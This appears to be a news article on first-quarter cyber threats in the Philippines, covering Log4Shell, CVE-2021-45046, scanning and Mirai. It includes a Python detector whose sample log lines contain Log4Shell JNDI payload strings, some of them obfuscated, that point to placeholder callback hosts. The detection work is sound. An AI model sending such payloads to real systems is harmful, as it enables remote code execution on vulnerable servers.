During the first quarter of the year, the Philippines continued to experience cyber threats affecting the Internet, applications and devices.
Fortinet reported that the zero-day vulnerability officially labeled CVE-2021-44228, popularly known as Log4Shell, was discovered in Apache Log4j, the Java logging library maintained by the Apache Software Foundation. It has the potential for wide-scale impact across most Java applications, including business systems that record log information. The vulnerability, which affects Log4j version 2 and was publicly disclosed on December 9, 2021, was one of the most detected exploitation techniques in the Philippines.
This vulnerability should be taken seriously: it is trivial to exploit, and successful exploitation permits a remote attacker to achieve full remote code execution (RCE) on vulnerable systems. The ubiquitous nature of Log4j is part of what makes CVE-2021-44228 so dangerous. Millions of applications, including services such as iCloud, Steam and Minecraft, use Log4j for logging, and all of these were found to have been vulnerable. An attacker simply needs to get the application to log a specially crafted string to exploit the flaw.
Fortinet describes how the exploit works. Once a target has been selected, the attacker adds a JNDI lookup string to a connection request to that target, placed in a field that is likely to be logged via Log4j. A vulnerable version of Log4j then parses that string and attempts to contact the attacker-named ‘malicious-server host’ with an LDAP query. Should the connection succeed, the malicious server under the attacker's control replies to the query with directory data that points to a remote Java class file. The Java runtime on the target then downloads that class file and executes it.
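The "special string" mentioned above and the JNDI lookup flow just described can be recognised in logs, which is the first thing a defender needs when this exploit is being sprayed at scale. The following is an added example written for this page, not code from Fortinet or FortiGuard Labs: it normalises the common evasion forms of the lookup string (URL encoding and the nested `${lower:…}`, `${upper:…}` and `${…:-x}` tricks) and then extracts the scheme, callback host and port from each hit, which is what you would feed into an egress block list. The log lines, IP addresses and ports are constructed for the example; real obfuscation is broader than the three lookup forms handled here, so treat this as a starting point rather than a complete detector.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not from the report). The User-Agent
# and query string are the fields a Log4j-backed application would log.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [12/Dec/2021:03:14:07 +0800] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Dec/2021:03:14:09 +0800] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [12/Dec/2021:03:14:11 +0800] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/b}"',
    '10.0.0.9 - - [12/Dec/2021:03:14:13 +0800] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.11%3A1099%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [12/Dec/2021:03:14:15 +0800] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.12/d}"',
]

# Innermost ${...} lookup: no nested "${", "{" or "}" inside the braces.
INNERMOST_LOOKUP = re.compile(r'\$\{([^${}]*)\}')

# A resolved lookup string that would trigger the JNDI code path. Captures
# scheme, host and optional port so the callback server can be blocked.
JNDI_LOOKUP = re.compile(
    r'\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://([^/:}\s]+)(?::(\d+))?',
    re.IGNORECASE,
)


def _resolve_simple(inner):
    """Return the literal text a simple evasion lookup resolves to, or None.

    Handles ${lower:x} -> "x", ${upper:x} -> "X" and the default-value form
    ${name:key:-x} (including the degenerate ${::-x}) -> "x". Anything else,
    including the jndi: lookup itself, is left alone.
    """
    m = re.fullmatch(r'lower:(.*)', inner)
    if m:
        return m.group(1).lower()
    m = re.fullmatch(r'upper:(.*)', inner)
    if m:
        return m.group(1).upper()
    m = re.fullmatch(r'[^:]*:[^:]*:-(.*)', inner)
    if m:
        return m.group(1)
    return None


def normalize(text, max_rounds=20):
    """URL-decode and repeatedly collapse innermost evasion lookups."""
    text = urllib.parse.unquote(text)
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            resolved = _resolve_simple(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNERMOST_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def find_jndi(line):
    """Return one dict per JNDI lookup found in the normalised line."""
    return [
        {'scheme': m.group(1).lower(), 'host': m.group(2), 'port': m.group(3)}
        for m in JNDI_LOOKUP.finditer(normalize(line))
    ]


def scan(lines):
    """Return (line_index, hits) for every line carrying a JNDI lookup."""
    results = []
    for i, line in enumerate(lines):
        hits = find_jndi(line)
        if hits:
            results.append((i, hits))
    return results


def callback_hosts(lines):
    """Distinct attacker-controlled hosts referenced across all hits."""
    return sorted({h['host'] for _, hits in scan(lines) for h in hits})


if __name__ == '__main__':
    for idx, hits in scan(SAMPLE_LOG_LINES):
        print(f'line {idx}: {hits}')
    print('callback hosts:', callback_hosts(SAMPLE_LOG_LINES))
```

Run it as-is to see that the benign line is ignored while the plain, nested, URL-encoded and default-value variants are all reduced to the same `${jndi:…}` shape. The host and port extracted from each hit are the values to correlate with outbound LDAP, RMI or DNS connections from the application host, which is the surest sign that the lookup was actually evaluated rather than merely logged.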
Log4Shell can potentially compromise millions of devices across the Internet. In light of this, FortiGuard Labs released the IPS signature “Apache Log4j Error Log Remote Code Execution” to detect and mitigate exploit attempts; it was first shipped in IPS package version 19.215.
The second vulnerability, CVE-2021-45046, was initially described as causing only a Denial of Service (DoS) condition when successfully exploited. It was later revealed that, because the fix shipped in Log4j 2.15.0 was incomplete for certain non-default configurations, successful exploitation could also achieve an information leak and remote code execution in some environments, and local code execution in all environments. Threat actors wasted no time in leveraging Log4Shell, deploying new malware and potentially unwanted programs (PUPs) to compromise vulnerable machines.
In addition, a considerable increase in mass scanning was detected. Scanning allows an adversary to identify the services exposed by a target system and to plan further attacks based on the findings; adversaries perform different forms of active scanning depending on the information they seek, and the scans can be carried out in various ways, including by using native features of network protocols. FortiGuard Labs also detected many Remote Code Execution attacks against IoT devices and home routers, which allow the adversary to gain control over the vulnerable systems.
Meanwhile, Mirai continues to be the botnet campaign registering the most activity in the Philippines. Mirai is Linux IoT malware that causes infected machines to join a botnet (MITRE ATT&CK T1584.005) [16] used for Distributed Denial of Service (DDoS) attacks. FortiGuard Labs is also aware of a new Mirai variant spreading by exploiting CVE-2021-44228 (Log4Shell). Given that the vulnerability was only disclosed on December 9, 2021, this is possibly the first Mirai variant to carry embedded Log4Shell exploit code.